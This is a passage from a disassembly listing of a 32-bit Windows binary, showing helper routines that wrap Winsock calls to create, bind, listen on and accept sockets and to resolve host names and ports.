call sub_404CBB
pop ecx
cmp [ebp+var_C], 0
jz short loc_4042DA
cmp [ebp+var_C], 0FFFFFFFFh
jz short loc_4042DA
and [ebp+var_18], 0
jmp short loc_4042E1
; ---------------------------------------------------------------------------
loc_4042DA: ; CODE XREF: sub_404279+53�j
; sub_404279+59�j
mov [ebp+var_18], 1
loc_4042E1: ; CODE XREF: sub_404279+5F�j
mov eax, [ebp+var_18]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4042F6
push [ebp+var_C]
call sub_4053B1
pop ecx
loc_4042F6: ; CODE XREF: sub_404279+72�j
mov eax, [ebp+var_14]
locret_4042F9: ; CODE XREF: sub_404279+29�j
leave
retn
sub_404279 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042FB proc near ; CODE XREF: sub_411D68+4�p
; sub_41349C+1FA�p ...
push ebp
mov ebp, esp
cmp ds:dword_41E364, 0
jnz short loc_404327
call sub_404279
push eax
push offset dword_41E368
call sub_409C9D
pop ecx
pop ecx
push 1
push offset dword_41E364
call sub_409C9D
pop ecx
pop ecx
loc_404327: ; CODE XREF: sub_4042FB+A�j
mov eax, ds:dword_41E368
pop ebp
retn
sub_4042FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40432E proc near ; CODE XREF: sub_40435B+6�p
; sub_4046BC+5D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push 1
push 17h
call ds:dword_417218 ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404350
push [ebp+var_4]
call sub_4053B1
pop ecx
loc_404350: ; CODE XREF: sub_40432E+17�j
xor eax, eax
cmp [ebp+var_4], 0FFFFFFFFh
setnz al
leave
retn
sub_40432E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40435B proc near ; CODE XREF: sub_4083AD:loc_4085D6�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
call sub_40432E
test eax, eax
jnz short loc_40436E
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40435B+D�j
lea eax, [ebp+var_14]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_14]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_404392
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_404392: ; CODE XREF: sub_40435B+31�j
push 0BB8h
push 2
lea eax, [ebp+var_14]
push eax
push offset dword_418A5C
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call sub_404CBB
pop ecx
cmp [ebp+var_8], 0
jz short loc_4043CB
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4043CB
mov [ebp+var_18], 1
jmp short loc_4043CF
; ---------------------------------------------------------------------------
loc_4043CB: ; CODE XREF: sub_40435B+5F�j
; sub_40435B+65�j
and [ebp+var_18], 0
loc_4043CF: ; CODE XREF: sub_40435B+6E�j
mov eax, [ebp+var_18]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4043E4
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_4043E4: ; CODE XREF: sub_40435B+7E�j
mov eax, [ebp+var_4]
locret_4043E7: ; CODE XREF: sub_40435B+11�j
; sub_40435B+35�j
leave
retn
sub_40435B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E9 proc near ; CODE XREF: sub_408B30:loc_408C9F�p
; sub_40CA29+231�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
push offset dword_418A1C
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_1C]
push eax
call sub_4105FB
pop ecx
push 7D0h
push 2
push offset a80 ; "80"
lea eax, [ebp+var_1C]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_404439
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_404439
mov [ebp+var_20], 1
jmp short loc_40443D
; ---------------------------------------------------------------------------
loc_404439: ; CODE XREF: sub_4043E9+3F�j
; sub_4043E9+45�j
and [ebp+var_20], 0
loc_40443D: ; CODE XREF: sub_4043E9+4E�j
mov eax, [ebp+var_20]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404452
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_404452: ; CODE XREF: sub_4043E9+5E�j
mov eax, [ebp+var_4]
leave
retn
sub_4043E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404457 proc near ; CODE XREF: sub_404FE7+AF�p
; sub_4050EA+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
cmp [ebp+arg_4], 0
setz al
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push [ebp+arg_0]
call ds:dword_417214 ; ioctlsocket
leave
retn
sub_404457 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40447B proc near ; CODE XREF: sub_40732D+22E�p
; sub_40732D+296�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 4004667Fh
push [ebp+arg_0]
call ds:dword_417214 ; ioctlsocket
xor eax, eax
cmp [ebp+var_4], 0
setnz al
leave
retn
sub_40447B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40449C proc near ; CODE XREF: sub_40D871+5A1�p
; sub_411DC5+65�p
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_4044CC
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044CC: ; CODE XREF: sub_40449C+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jz short loc_4044F2
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044F2: ; CODE XREF: sub_40449C+50�j
push 1
pop eax
locret_4044F5: ; CODE XREF: sub_40449C+2E�j
; sub_40449C+54�j
leave
retn
sub_40449C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044F7 proc near ; CODE XREF: sub_40732D+DD�p
; sub_4129CA+29�p ...
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_404527
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_404527: ; CODE XREF: sub_4044F7+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jz short loc_40454D
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_40454D: ; CODE XREF: sub_4044F7+50�j
push 1
pop eax
locret_404550: ; CODE XREF: sub_4044F7+2E�j
; sub_4044F7+54�j
leave
retn
sub_4044F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404552 proc near ; CODE XREF: sub_41331E+A6�p
; sub_415F69+256�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404582
xor eax, eax
jmp short locret_4045B0
; ---------------------------------------------------------------------------
loc_404582: ; CODE XREF: sub_404552+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_4045B0: ; CODE XREF: sub_404552+2E�j
leave
retn
sub_404552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B2 proc near ; CODE XREF: sub_4143B0+191�p
; sub_415F69+20A�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_4045E2
xor eax, eax
jmp short locret_404610
; ---------------------------------------------------------------------------
loc_4045E2: ; CODE XREF: sub_4045B2+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_404610: ; CODE XREF: sub_4045B2+2E�j
leave
retn
sub_4045B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404612 proc near ; CODE XREF: sub_40D871+69C�p
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
lea eax, [ebp+var_408]
push eax
push 0
push 0
push [ebp+arg_0]
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jnz loc_4046B8
mov eax, [ebp+var_408]
mov [ebp+var_40C], eax
loc_404643: ; CODE XREF: sub_404612+98�j
cmp [ebp+var_40C], 0
jz short loc_4046AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_404]
push eax
mov eax, [ebp+var_40C]
push dword ptr [eax+10h]
mov eax, [ebp+var_40C]
push dword ptr [eax+18h]
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jnz short loc_40469B
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 2
jnz short loc_40469B
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov al, 1
jmp short locret_4046BA
; ---------------------------------------------------------------------------
loc_40469B: ; CODE XREF: sub_404612+66�j
; sub_404612+72�j
mov eax, [ebp+var_40C]
mov eax, [eax+1Ch]
mov [ebp+var_40C], eax
jmp short loc_404643
; ---------------------------------------------------------------------------
loc_4046AC: ; CODE XREF: sub_404612+38�j
push [ebp+var_408]
call ds:dword_41DF5C ; freeaddrinfo
loc_4046B8: ; CODE XREF: sub_404612+1F�j
xor al, al
locret_4046BA: ; CODE XREF: sub_404612+87�j
leave
retn
sub_404612 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BC proc near ; CODE XREF: sub_4020C2+124�p
; sub_403DF3+36�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
xor eax, eax
test eax, eax
jz short loc_4046D1
mov [ebp+var_3C], 2
jmp short loc_4046D8
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_4046BC+A�j
mov [ebp+var_3C], 1
loc_4046D8: ; CODE XREF: sub_4046BC+13�j
mov eax, [ebp+var_3C]
mov [ebp+var_8], eax
push 1008h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4046F9
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_4046F9: ; CODE XREF: sub_4046BC+34�j
mov eax, [ebp+var_2C]
and dword ptr [eax], 0
mov eax, [ebp+var_2C]
and dword ptr [eax+804h], 0
push 20h
push 0
lea eax, [ebp+var_28]
push eax
call sub_416B6A ; memset
add esp, 0Ch
call sub_40432E
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
mov [ebp+var_24], eax
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
mov [ebp+var_28], 5
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
push 0
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jz short loc_40475D
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_40475D: ; CODE XREF: sub_4046BC+8F�j
mov eax, [ebp+var_30]
mov [ebp+var_4], eax
jmp short loc_40476E
; ---------------------------------------------------------------------------
loc_404765: ; CODE XREF: sub_4046BC+DD�j
; sub_4046BC+F1�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40476E: ; CODE XREF: sub_4046BC+A7�j
cmp [ebp+var_4], 0
jz loc_40484E
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFFh
jnz short loc_40479B
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_40479B: ; CODE XREF: sub_4046BC+DB�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 2
jz short loc_4047AF
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 17h
jz short loc_4047AF
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_4046BC+E6�j
; sub_4046BC+EF�j
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz short loc_4047D6
mov [ebp+var_38], 1
push 4
lea eax, [ebp+var_38]
push eax
push 4
push 0FFFFh
push [ebp+var_34]
call ds:dword_417204 ; setsockopt
loc_4047D6: ; CODE XREF: sub_4046BC+FB�j
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_34]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4047FE
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_4047FE: ; CODE XREF: sub_4046BC+132�j
cmp [ebp+var_8], 1
jnz short loc_404822
push 32h
push [ebp+var_34]
call ds:dword_417268 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_404822
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_404822: ; CODE XREF: sub_4046BC+146�j
; sub_4046BC+156�j
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_34]
mov [ecx+eax*4+4], edx
mov eax, [ebp+var_2C]
mov eax, [eax]
inc eax
mov ecx, [ebp+var_2C]
mov [ecx], eax
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 200h
jnz short loc_404849
jmp short loc_40484E
; ---------------------------------------------------------------------------
loc_404849: ; CODE XREF: sub_4046BC+189�j
jmp loc_404765
; ---------------------------------------------------------------------------
loc_40484E: ; CODE XREF: sub_4046BC+B6�j
; sub_4046BC+18B�j
push [ebp+var_30]
call ds:dword_41DF5C ; freeaddrinfo
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 0
jnz short loc_40486C
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp short locret_40486F
; ---------------------------------------------------------------------------
loc_40486C: ; CODE XREF: sub_4046BC+1A1�j
mov eax, [ebp+var_2C]
locret_40486F: ; CODE XREF: sub_4046BC+38�j
; sub_4046BC+9C�j ...
leave
retn
sub_4046BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404871 proc near ; CODE XREF: sub_411BBC+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40488F
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_40488F: ; CODE XREF: sub_404871+18�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
add eax, [ecx]
cmp eax, 200h
jbe short loc_4048AD
push [ebp+var_4]
call sub_404CBB
pop ecx
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_404871+2D�j
mov eax, [ebp+var_4]
mov eax, [eax]
shl eax, 2
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*4+4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+var_4]
add eax, [ecx]
mov ecx, [ebp+arg_0]
mov [ecx], eax
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
push 1
pop eax
locret_4048ED: ; CODE XREF: sub_404871+1C�j
; sub_404871+3A�j
leave
retn
sub_404871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048EF proc near ; CODE XREF: sub_4020C2+22E�p
; sub_403DF3+8D�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
push esi
mov [ebp+var_4], 80h
and [ebp+var_8C], 0
jmp short loc_404916
; ---------------------------------------------------------------------------
loc_404909: ; CODE XREF: sub_4048EF+133�j
; sub_4048EF:loc_404A32�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404916: ; CODE XREF: sub_4048EF+18�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404A37
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404A32
loc_40494A: ; CODE XREF: sub_4048EF+100�j
and [ebp+var_9C], 0
jmp short loc_404960
; ---------------------------------------------------------------------------
loc_404953: ; CODE XREF: sub_4048EF:loc_4049E6�j
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
loc_404960: ; CODE XREF: sub_4048EF+62�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_9C]
cmp ecx, [eax+804h]
jnb short loc_4049EB
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_4049E6
loc_404990: ; CODE XREF: sub_4048EF+E0�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_9C], eax
jnb short loc_4049D1
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_9C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
jmp short loc_404990
; ---------------------------------------------------------------------------
loc_4049D1: ; CODE XREF: sub_4048EF+B1�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_4049EB
; ---------------------------------------------------------------------------
loc_4049E6: ; CODE XREF: sub_4048EF+9F�j
jmp loc_404953
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4048EF+80�j
; sub_4048EF+F5�j
xor eax, eax
test eax, eax
jnz loc_40494A
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call ds:dword_4171FC ; accept
mov [ebp+var_98], eax
cmp [ebp+var_98], 0FFFFFFFFh
jnz short loc_404A27
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A27: ; CODE XREF: sub_4048EF+131�j
mov eax, [ebp+var_98]
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404A32: ; CODE XREF: sub_4048EF+55�j
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A37: ; CODE XREF: sub_4048EF+32�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
and [ebp+var_8C], 0
jmp short loc_404A57
; ---------------------------------------------------------------------------
loc_404A4A: ; CODE XREF: sub_4048EF+21D�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404A57: ; CODE XREF: sub_4048EF+159�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404B11
loc_404A68: ; CODE XREF: sub_4048EF+217�j
and [ebp+var_A0], 0
jmp short loc_404A7E
; ---------------------------------------------------------------------------
loc_404A71: ; CODE XREF: sub_4048EF:loc_404AB0�j
mov eax, [ebp+var_A0]
inc eax
mov [ebp+var_A0], eax
loc_404A7E: ; CODE XREF: sub_4048EF+180�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnb short loc_404AB2
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404AB0
jmp short loc_404AB2
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_4048EF+1BD�j
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AB2: ; CODE XREF: sub_4048EF+19E�j
; sub_4048EF+1BF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnz short loc_404B02
mov eax, [ebp+arg_0]
cmp dword ptr [eax+804h], 200h
jnb short loc_404B02
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
loc_404B02: ; CODE XREF: sub_4048EF+1D2�j
; sub_4048EF+1E1�j
xor eax, eax
test eax, eax
jnz loc_404A68
jmp loc_404A4A
; ---------------------------------------------------------------------------
loc_404B11: ; CODE XREF: sub_4048EF+173�j
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_94], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_90], edx
lea eax, [ebp+var_94]
push eax
push 0
push 0
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_41722C ; select
mov [ebp+var_88], eax
cmp [ebp+var_88], 0
jnz short loc_404B71
or eax, 0FFFFFFFFh
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_4048EF+278�j
cmp [ebp+var_88], 0FFFFFFFFh
jnz short loc_404B81
xor eax, eax
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B81: ; CODE XREF: sub_4048EF+289�j
and [ebp+var_8C], 0
jmp short loc_404B97
; ---------------------------------------------------------------------------
loc_404B8A: ; CODE XREF: sub_4048EF+3B4�j
; sub_4048EF:loc_404CB0�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404B97: ; CODE XREF: sub_4048EF+299�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404CB5
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404CB0
loc_404BCB: ; CODE XREF: sub_4048EF+381�j
and [ebp+var_A8], 0
jmp short loc_404BE1
; ---------------------------------------------------------------------------
loc_404BD4: ; CODE XREF: sub_4048EF:loc_404C67�j
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
loc_404BE1: ; CODE XREF: sub_4048EF+2E3�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A8]
cmp ecx, [eax+804h]
jnb short loc_404C6C
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404C67
loc_404C11: ; CODE XREF: sub_4048EF+361�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_A8], eax
jnb short loc_404C52
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_A8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
jmp short loc_404C11
; ---------------------------------------------------------------------------
loc_404C52: ; CODE XREF: sub_4048EF+332�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_404C6C
; ---------------------------------------------------------------------------
loc_404C67: ; CODE XREF: sub_4048EF+320�j
jmp loc_404BD4
; ---------------------------------------------------------------------------
loc_404C6C: ; CODE XREF: sub_4048EF+301�j
; sub_4048EF+376�j
xor eax, eax
test eax, eax
jnz loc_404BCB
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call ds:dword_4171FC ; accept
mov [ebp+var_A4], eax
cmp [ebp+var_A4], 0FFFFFFFFh
jnz short loc_404CA8
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CA8: ; CODE XREF: sub_4048EF+3B2�j
mov eax, [ebp+var_A4]
jmp short loc_404CB8
; ---------------------------------------------------------------------------
loc_404CB0: ; CODE XREF: sub_4048EF+2D6�j
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_4048EF+2B3�j
or eax, 0FFFFFFFFh
loc_404CB8: ; CODE XREF: sub_4048EF+13E�j
; sub_4048EF+27D�j ...
pop esi
leave
retn
sub_4048EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CBB proc near ; CODE XREF: sub_4020C2+175�p
; sub_4020C2+25F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404CCC
; ---------------------------------------------------------------------------
loc_404CC5: ; CODE XREF: sub_404CBB+3E�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CCC: ; CODE XREF: sub_404CBB+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short loc_404CFB
cmp ds:dword_41DF08, 0
jz short loc_404CE9
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 64h
jbe short loc_404CE9
jmp short loc_404CFB
; ---------------------------------------------------------------------------
loc_404CE9: ; CODE XREF: sub_404CBB+22�j
; sub_404CBB+2A�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_4053B1
pop ecx
jmp short loc_404CC5
; ---------------------------------------------------------------------------
loc_404CFB: ; CODE XREF: sub_404CBB+19�j
; sub_404CBB+2C�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
leave
retn
sub_404CBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D10 proc near ; CODE XREF: sub_41349C+1B7�p
